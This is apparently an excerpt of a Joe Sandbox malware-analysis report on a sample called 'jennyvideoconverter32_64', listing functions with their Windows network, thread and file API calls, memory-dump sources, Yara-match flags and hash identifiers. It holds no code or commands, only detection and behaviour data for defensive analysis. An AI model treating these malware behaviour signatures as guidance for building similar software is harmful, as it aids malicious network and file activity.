                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$Socketsetsockopt
                                                                                • String ID:
                                                                                • API String ID: 2093263913-0
                                                                                • Opcode ID: 70334cf7cde1e91544042ab2e1beef9afe73319da957fd0459e83b7b709ca708
                                                                                • Instruction ID: 5f3d401ed6b32fda5cbf7af721211c9f7eaa4a032e25d734c5b02710d25841b4
                                                                                • Opcode Fuzzy Hash: 70334cf7cde1e91544042ab2e1beef9afe73319da957fd0459e83b7b709ca708
                                                                                • Instruction Fuzzy Hash: F7012571941204BBDB205F66DC48F9EBBA9EB89761F008565F9199B281D7748D00CBB1
                                                                                Function 02D82DB5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 02D82D39: WSASetLastError.WS2_32(00000000), ref: 02D82D47
                                                                                  • Part of subcall function 02D82D39: WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 02D82D5C
                                                                                • WSASetLastError.WS2_32(00000000), ref: 02D82E6D
                                                                                • select.WS2_32(?,00000000,00000001,00000000,00000000), ref: 02D82E83
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$Sendselect
                                                                                • String ID: 3'
                                                                                • API String ID: 2958345159-280543908
                                                                                • Opcode ID: 6a9019e6ad640756cb76e2dcc8b52e16dd43d866fb9fbe7b3ce7734ac48d1d15
                                                                                • Instruction ID: a3102f73192ae059b746ac0692003ce13983684b9d7738bc6ef35edc4ba1194d
                                                                                • Opcode Fuzzy Hash: 6a9019e6ad640756cb76e2dcc8b52e16dd43d866fb9fbe7b3ce7734ac48d1d15
                                                                                • Instruction Fuzzy Hash: 64319AB1A002499BDF11AFA4D808BEEBBAAEF05314F00455AEC4997340F7749D55CBE4
                                                                                Function 02D8959C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 78networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • WSASetLastError.WS2_32(00000000,?,?,?,?,?,?,?,02D88306,?,?,00000000), ref: 02D89603
                                                                                • getsockname.WS2_32(?,?,?), ref: 02D89619
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLastgetsockname
                                                                                • String ID: &'
                                                                                • API String ID: 566540725-655172784
                                                                                • Opcode ID: 2ca4f0f8be11d4caa61327ae70b14126839c86b26e243cef46ec224fe8eb45bc
                                                                                • Instruction ID: 55d2eb3b0a974d425a8a13fb8373810edbb0700760bd2d25ef84f000d07593fe
                                                                                • Opcode Fuzzy Hash: 2ca4f0f8be11d4caa61327ae70b14126839c86b26e243cef46ec224fe8eb45bc
                                                                                • Instruction Fuzzy Hash: 9C218372A00248DBDB10DF68D845ADEB7F5FF48320F10816AE918EB380D730ED458BA0
                                                                                Function 02D82AC7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • WSASetLastError.WS2_32(00000000), ref: 02D82AEA
                                                                                • connect.WS2_32(?,?,?), ref: 02D82AF5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLastconnect
                                                                                • String ID: 3'
                                                                                • API String ID: 374722065-280543908
                                                                                • Opcode ID: 482d7d9216ab2a1a948540bbfb50d9a3375c4f6a077f0b135f48bbf1a0c11725
                                                                                • Instruction ID: 67331955dc693571835a27c69097b34abdf6a07083cc1bda84e3fe3099802f7b
                                                                                • Opcode Fuzzy Hash: 482d7d9216ab2a1a948540bbfb50d9a3375c4f6a077f0b135f48bbf1a0c11725
                                                                                • Instruction Fuzzy Hash: 2D21A771E04244ABDF10BFB4D408AAEBBBAEF45325F108559EC1993384DB749E05CFA1
                                                                                Function 02D8353E Relevance: 4.6, APIs: 3, Instructions: 127COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog
                                                                                • String ID:
                                                                                • API String ID: 3519838083-0
                                                                                • Opcode ID: 6e4265b362242b88166870fd6946a4e12b41f0e6b955258e12e886771d408946
                                                                                • Instruction ID: 36fc0aa80a6b5f9cae08397a381c992044ad703ef9019030aaee553344bd627b
                                                                                • Opcode Fuzzy Hash: 6e4265b362242b88166870fd6946a4e12b41f0e6b955258e12e886771d408946
                                                                                • Instruction Fuzzy Hash: 395138B1904246DFCB48EF68D541AAABBB1FF08720F10819EE8699B380D774DD10CFA0
                                                                                Function 02D8369A Relevance: 4.6, APIs: 3, Instructions: 60COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • InterlockedIncrement.KERNEL32(?), ref: 02D836A7
                                                                                  • Part of subcall function 02D82420: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02D82432
                                                                                  • Part of subcall function 02D82420: PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02D82445
                                                                                  • Part of subcall function 02D82420: RtlEnterCriticalSection.NTDLL(?), ref: 02D82454
                                                                                  • Part of subcall function 02D82420: InterlockedExchange.KERNEL32(?,00000001), ref: 02D82469
                                                                                  • Part of subcall function 02D82420: RtlLeaveCriticalSection.NTDLL(?), ref: 02D82470
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Interlocked$CriticalExchangeSection$CompareCompletionEnterIncrementLeavePostQueuedStatus
                                                                                • String ID:
                                                                                • API String ID: 1601054111-0
                                                                                • Opcode ID: 5ac02cba9a58e8a41f92c7abffb335ced420e5a1bca52b72f127547a95b333fa
                                                                                • Instruction ID: c7a0a80807553c1242186dc19c6bd2f8680a8ac7a9d6c310bd8b0e9d647116c9
                                                                                • Opcode Fuzzy Hash: 5ac02cba9a58e8a41f92c7abffb335ced420e5a1bca52b72f127547a95b333fa
                                                                                • Instruction Fuzzy Hash: 3411C4B5100249ABDB21AF18CC45FAA3BA9EF00B54F104456FD5A86390C734DC60CBA4
                                                                                Function 02D92030 Relevance: 4.5, APIs: 3, Instructions: 42threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __beginthreadex.LIBCMT ref: 02D92046
                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,00000002,02D8A8BC,00000000), ref: 02D92077
                                                                                • ResumeThread.KERNELBASE(?,?,?,?,?,00000002,02D8A8BC,00000000), ref: 02D92085
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseHandleResumeThread__beginthreadex
                                                                                • String ID:
                                                                                • API String ID: 1685284544-0
                                                                                • Opcode ID: d7f001b832e90fd8240c50e396877f70ce98f94dcc80954157c0a7602b6f8f52
                                                                                • Instruction ID: e3bf140cda8672d5cf20ffd7ab07e0cba64a19bc3369f3bf041138b6e8c7e26f
                                                                                • Opcode Fuzzy Hash: d7f001b832e90fd8240c50e396877f70ce98f94dcc80954157c0a7602b6f8f52
                                                                                • Instruction Fuzzy Hash: 8DF06271240201ABEB209EACDC89F95B3E8EF48725F24456AF55CD7394C771EC92DA90
                                                                                Function 0040B02C Relevance: 4.5, APIs: 3, Instructions: 29timeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCommandLineW.KERNEL32(00000000), ref: 0040B0A5
                                                                                • CommandLineToArgvW.SHELL32(00000000), ref: 0040B0AC
                                                                                • GetLocalTime.KERNEL32(00409F90), ref: 0040B9B8
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3335479194.0000000000409000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.3335479194.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: CommandLine$ArgvLocalTime
                                                                                • String ID:
                                                                                • API String ID: 3768950922-0
                                                                                • Opcode ID: 59b01a3e4a33034627a38184ad815265f60c57ad8a608ecca20853071ff8fe32
                                                                                • Instruction ID: 23e07588f498f8c5e05d00d86472bf9795cdc6e0188d96b461cacdec3fdbfefd
                                                                                • Opcode Fuzzy Hash: 59b01a3e4a33034627a38184ad815265f60c57ad8a608ecca20853071ff8fe32
                                                                                • Instruction Fuzzy Hash: 13F0A072800102EFCB046BA1DE4A42A37E4EA04359316897BD163FA0E5DF3D4846CB8E
                                                                                Function 0040B091 Relevance: 4.5, APIs: 3, Instructions: 22timeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCommandLineW.KERNEL32(00000000), ref: 0040B0A5
                                                                                • CommandLineToArgvW.SHELL32(00000000), ref: 0040B0AC
                                                                                • GetLocalTime.KERNEL32(00409F90), ref: 0040B9B8
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3335479194.0000000000409000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.3335479194.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: CommandLine$ArgvLocalTime
                                                                                • String ID:
                                                                                • API String ID: 3768950922-0
                                                                                • Opcode ID: 667fd779a13e85c584df1a8408aba4467e109f6cd77dd669f4557402a3646338
                                                                                • Instruction ID: 54adafcf78584c863c1ddd2f0e90149891305aa143cab3a49da3de5fd3a430ba
                                                                                • Opcode Fuzzy Hash: 667fd779a13e85c584df1a8408aba4467e109f6cd77dd669f4557402a3646338
                                                                                • Instruction Fuzzy Hash: 9EE04F72904102EFCB04ABE1AA4D46E37E8E604346321843BE113F60E1CB3C88559B5E
                                                                                Function 02D81AA9 Relevance: 4.5, APIs: 3, Instructions: 18networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • InterlockedIncrement.KERNEL32(02DB727C), ref: 02D81ABA
                                                                                • WSAStartup.WS2_32(00000002,00000000), ref: 02D81ACB
                                                                                • InterlockedExchange.KERNEL32(02DB7280,00000000), ref: 02D81AD7
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Interlocked$ExchangeIncrementStartup
                                                                                • String ID:
                                                                                • API String ID: 1856147945-0
                                                                                • Opcode ID: 05edf98d07eeb225bd3631bde7ae6c6ea3147fa524883abe2c18c26a00d6daea
                                                                                • Instruction ID: dbaa2c6c46acb6b5f89366b3ea95fbdfc96a1b4b6f85adf9a5c7b80794bc20b4
                                                                                • Opcode Fuzzy Hash: 05edf98d07eeb225bd3631bde7ae6c6ea3147fa524883abe2c18c26a00d6daea
                                                                                • Instruction Fuzzy Hash: F0D05E32E842049BF22176E0BD0FEBCF76CEB05611F100651FC6AC03C0EB519D2885AA
                                                                                Function 02D933D6 Relevance: 4.5, APIs: 3, Instructions: 16threadCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __getptd_noexit.LIBCMT ref: 02D933DA
                                                                                  • Part of subcall function 02D95BB2: GetLastError.KERNEL32(76230A60,7622F550,02D95DA0,02D92F73,7622F550,?,02D8606D,00000104,76230A60,7622F550,ntdll.dll,?,?,?,02D86508), ref: 02D95BB4
                                                                                  • Part of subcall function 02D95BB2: __calloc_crt.LIBCMT ref: 02D95BD5
                                                                                  • Part of subcall function 02D95BB2: __initptd.LIBCMT ref: 02D95BF7
                                                                                  • Part of subcall function 02D95BB2: GetCurrentThreadId.KERNEL32 ref: 02D95BFE
                                                                                  • Part of subcall function 02D95BB2: SetLastError.KERNEL32(00000000,02D8606D,00000104,76230A60,7622F550,ntdll.dll,?,?,?,02D86508), ref: 02D95C16
                                                                                • __freeptd.LIBCMT ref: 02D933F4
                                                                                  • Part of subcall function 02D934D9: LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,02D933F3), ref: 02D934F3
                                                                                  • Part of subcall function 02D934D9: GetProcAddress.KERNEL32(00000000), ref: 02D934FA
                                                                                  • Part of subcall function 02D934D9: RtlEncodePointer.NTDLL(00000000), ref: 02D93505
                                                                                  • Part of subcall function 02D934D9: RtlDecodePointer.NTDLL(02D933F3), ref: 02D93520
                                                                                • RtlExitUserThread.NTDLL(?,00000000,?,02D933B6,00000000), ref: 02D933FD
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLastPointerThread$AddressCurrentDecodeEncodeExitLibraryLoadProcUser__calloc_crt__freeptd__getptd_noexit__initptd
                                                                                • String ID:
                                                                                • API String ID: 2811226776-0
                                                                                • Opcode ID: 7de24039e75dbdf0909f8198a98cac44ee1948e834c40de40d6b9aa21396e3e6
                                                                                • Instruction ID: 8713e86efe22df076081f4dd931556dbd745cf83f8fbd99d98f8cf063bdf142c
                                                                                • Opcode Fuzzy Hash: 7de24039e75dbdf0909f8198a98cac44ee1948e834c40de40d6b9aa21396e3e6
                                                                                • Instruction Fuzzy Hash: EBD0A730502A15A7EF633720E405B4F7659EF01728F440064F481053048F605D81C9E6
                                                                                Function 02DCFEC1 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 130fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002DBA000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DBA000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2dba000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID: `io
                                                                                • API String ID: 823142352-3782016954
                                                                                • Opcode ID: 22de838a69165d44cc5e03d25e8e1bd2f3002673d603686f54c8cb3b43d18f4c
                                                                                • Instruction ID: e1dddb20988765f11a1bf7a9cb239a997f6e5b4e5dd66cb4bd80b9446aea6bc1
                                                                                • Opcode Fuzzy Hash: 22de838a69165d44cc5e03d25e8e1bd2f3002673d603686f54c8cb3b43d18f4c
                                                                                • Instruction Fuzzy Hash: AB416CF150C604AFE719BF19EC8177AB7E5EF84310F06882DE6C487740EA3568548B97
                                                                                Function 02D84BED Relevance: 3.1, APIs: 2, Instructions: 137COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D84BF2
                                                                                  • Part of subcall function 02D81BA7: __EH_prolog.LIBCMT ref: 02D81BAC
                                                                                  • Part of subcall function 02D81BA7: RtlEnterCriticalSection.NTDLL ref: 02D81BBC
                                                                                  • Part of subcall function 02D81BA7: RtlLeaveCriticalSection.NTDLL ref: 02D81BEA
                                                                                  • Part of subcall function 02D81BA7: RtlEnterCriticalSection.NTDLL ref: 02D81C13
                                                                                  • Part of subcall function 02D81BA7: RtlLeaveCriticalSection.NTDLL ref: 02D81C56
                                                                                  • Part of subcall function 02D8E02B: __EH_prolog.LIBCMT ref: 02D8E030
                                                                                  • Part of subcall function 02D8E02B: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D8E0AF
                                                                                • InterlockedExchange.KERNEL32(?,00000000), ref: 02D84CF2
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$H_prolog$EnterExchangeInterlockedLeave
                                                                                • String ID:
                                                                                • API String ID: 1927618982-0
                                                                                • Opcode ID: 0271a8902d253098c953437cbbc87aa5d55c641fdf1a189222444c69a553b072
                                                                                • Instruction ID: 664aa61bb83514d2925b295816f8ff2c440ef433161ee5a639a47828c5b73e43
                                                                                • Opcode Fuzzy Hash: 0271a8902d253098c953437cbbc87aa5d55c641fdf1a189222444c69a553b072
                                                                                • Instruction Fuzzy Hash: 25512771D04249DFDB15EFA8D484AEEBBB9EF08314F14809AE905AB351E7309E44CFA0
                                                                                Function 02D82D39 Relevance: 3.0, APIs: 2, Instructions: 50networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • WSASetLastError.WS2_32(00000000), ref: 02D82D47
                                                                                • WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 02D82D5C
                                                                                  • Part of subcall function 02D8A43C: WSAGetLastError.WS2_32(00000000,?,?,02D82A51), ref: 02D8A44A
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$Send
                                                                                • String ID:
                                                                                • API String ID: 1282938840-0
                                                                                • Opcode ID: f96539b2847ec7f5d1f2da1b93667a550a6a68bcd4594be1e7ddbe7cf82cc017
                                                                                • Instruction ID: 2a079a53823f7d61bc20275442e4d4c1fc8c531fa195507b7dd88bd2f422f17f
                                                                                • Opcode Fuzzy Hash: f96539b2847ec7f5d1f2da1b93667a550a6a68bcd4594be1e7ddbe7cf82cc017
                                                                                • Instruction Fuzzy Hash: E9015EB5504205EFDB206F95984886FBBE9FB45365B20452EF89983300EB709D00CBA1
                                                                                Function 02D8831D Relevance: 3.0, APIs: 2, Instructions: 32networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • WSASetLastError.WS2_32(00000000), ref: 02D8833A
                                                                                • shutdown.WS2_32(?,00000002), ref: 02D88343
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLastshutdown
                                                                                • String ID:
                                                                                • API String ID: 1920494066-0
                                                                                • Opcode ID: 220b2341fc38f6c51e27953f2c10b3a77dc86b25c02c8990c176e3e7bf506c07
                                                                                • Instruction ID: a1a694f37960fc64f17cdec6f7aa197aad264f834f5a332f50119ffe3052487a
                                                                                • Opcode Fuzzy Hash: 220b2341fc38f6c51e27953f2c10b3a77dc86b25c02c8990c176e3e7bf506c07
                                                                                • Instruction Fuzzy Hash: 70F01771A44318CFDB20AF68E404B9AB7E5FF09721F408819E9AAD7380D730AC10DBA5
                                                                                Function 004039F0 Relevance: 3.0, APIs: 2, Instructions: 30memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • HeapCreate.KERNELBASE(00000000,00001000,00000000,00402DBF,00000000), ref: 00403A01
                                                                                  • Part of subcall function 004038A8: GetVersionExA.KERNEL32 ref: 004038C7
                                                                                • HeapDestroy.KERNEL32 ref: 00403A40
                                                                                  • Part of subcall function 00403DC7: HeapAlloc.KERNEL32(00000000,00000140,00403A29,000003F8), ref: 00403DD4
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3335479194.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.3335479194.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$AllocCreateDestroyVersion
                                                                                • String ID:
                                                                                • API String ID: 2507506473-0
                                                                                • Opcode ID: 08f14aee262382775140a5fb38b16d88e88289f6ea168ffb6a246c9e47cbf934
                                                                                • Instruction ID: 5dadef9d12e489db140da5c14b34350ea54a5b880f3286d9e4ff1a1591b79aa3
                                                                                • Opcode Fuzzy Hash: 08f14aee262382775140a5fb38b16d88e88289f6ea168ffb6a246c9e47cbf934
                                                                                • Instruction Fuzzy Hash: 04F065707553016ADB24EF705E4676B3DD8AB80B53F10443BF541F41E0EB7C8690991A
                                                                                Function 0040B880 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 7stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • lstrcmpiW.KERNELBASE(?,/chk), ref: 0040B95C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3335479194.0000000000409000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.3335479194.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: lstrcmpi
                                                                                • String ID: /chk
                                                                                • API String ID: 1586166983-3837807730
                                                                                • Opcode ID: af6fa81dad960db4c1e64f221b36a3390aa195560f18da386ed3a98d31594a07
                                                                                • Instruction ID: 495c3e075edc24a6fcc213445aa4e79cffea7e25fd33ba9b7d8bb21698b3df4f
                                                                                • Opcode Fuzzy Hash: af6fa81dad960db4c1e64f221b36a3390aa195560f18da386ed3a98d31594a07
                                                                                • Instruction Fuzzy Hash: ECB092B0288B02FAD6022B624E086117A70AA147013218136E813B42E4C7BAA421F6AE
                                                                                Function 02D85119 Relevance: 1.7, APIs: 1, Instructions: 196COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D8511E
                                                                                  • Part of subcall function 02D83D7E: htons.WS2_32(?), ref: 02D83DA2
                                                                                  • Part of subcall function 02D83D7E: htonl.WS2_32(00000000), ref: 02D83DB9
                                                                                  • Part of subcall function 02D83D7E: htonl.WS2_32(00000000), ref: 02D83DC0
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: htonl$H_prologhtons
                                                                                • String ID:
                                                                                • API String ID: 4039807196-0
                                                                                • Opcode ID: 0b496904cfbc03273e89227421944ecae251e4bfe6b6881a71cca91e6ee947f9
                                                                                • Instruction ID: f3c075348957c0595ef6c0235a04661be9325a568ace1f534f493c089a6dd651
                                                                                • Opcode Fuzzy Hash: 0b496904cfbc03273e89227421944ecae251e4bfe6b6881a71cca91e6ee947f9
                                                                                • Instruction Fuzzy Hash: 508127B5D0424E8ECF05EFA8E040AEEBBB9EF48210F10815AD855B7340EB755A05CF75
                                                                                Function 02D844AB Relevance: 1.6, APIs: 1, Instructions: 122COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog
                                                                                • String ID:
                                                                                • API String ID: 3519838083-0
                                                                                • Opcode ID: f8859951af11535c4d7db5cb41bd7c14097f499bcc6b8edba717c907f9406fa4
                                                                                • Instruction ID: 9cbe7e304b41e62357a02fb2fbb2e43049943641d083feeedaf8fd516c082638
                                                                                • Opcode Fuzzy Hash: f8859951af11535c4d7db5cb41bd7c14097f499bcc6b8edba717c907f9406fa4
                                                                                • Instruction Fuzzy Hash: F241077190120EAFCF04EF99D890EEEBBBAFF88314F54416AE545A7240D7749A45CFA0
                                                                                Function 02DD86D0 Relevance: 1.6, APIs: 1, Instructions: 122fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002DBA000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DBA000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2dba000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: FileRead
                                                                                • String ID:
                                                                                • API String ID: 2738559852-0
                                                                                • Opcode ID: adc81ab58179cf194ea68349e0dc1a25fe6f2d244e2843d209253108725c740a
                                                                                • Instruction ID: d294e4bb90a95ceb7762ef4c44c41666c2673456d9e755c688a38d278597435f
                                                                                • Opcode Fuzzy Hash: adc81ab58179cf194ea68349e0dc1a25fe6f2d244e2843d209253108725c740a
                                                                                • Instruction Fuzzy Hash: 0A4141B250C610AFE7156E19DC85BAABBE9EF94720F06492DEBC883740D63558408BDB
                                                                                Function 02DBFA26 Relevance: 1.6, APIs: 1, Instructions: 83fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002DBA000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DBA000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2dba000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: DeleteFile
                                                                                • String ID:
                                                                                • API String ID: 4033686569-0
                                                                                • Opcode ID: f3ef28c9098564d07ae337382e149d342a29a769a9454d9c368cd47cc928549e
                                                                                • Instruction ID: 52cd15f7d858df478c1ecd1296751d19e1824bd1769c185215a1a932b451d954
                                                                                • Opcode Fuzzy Hash: f3ef28c9098564d07ae337382e149d342a29a769a9454d9c368cd47cc928549e
                                                                                • Instruction Fuzzy Hash: CB2145F260C600AFE305AF19ED557BEFBE9EF94720F16892EE2C5C2710D67548408A97
                                                                                Function 02D8E8F4 Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D8E8F9
                                                                                  • Part of subcall function 02D81A01: TlsGetValue.KERNEL32 ref: 02D81A0A
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prologValue
                                                                                • String ID:
                                                                                • API String ID: 3700342317-0
                                                                                • Opcode ID: fb403a29094ad452e8a02020587006795a677b238848b787992dca12efb898d4
                                                                                • Instruction ID: 32959a3388341867b84f489d3158ccd97149871ec7102f8a2802e7d183289469
                                                                                • Opcode Fuzzy Hash: fb403a29094ad452e8a02020587006795a677b238848b787992dca12efb898d4
                                                                                • Instruction Fuzzy Hash: 6C211BB2D04209AFDB04EFA4D940AEEBBF9EB49314F14451AE919A7340D771AD05CFB1
                                                                                Function 02DE71E7 Relevance: 1.6, APIs: 1, Instructions: 66fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
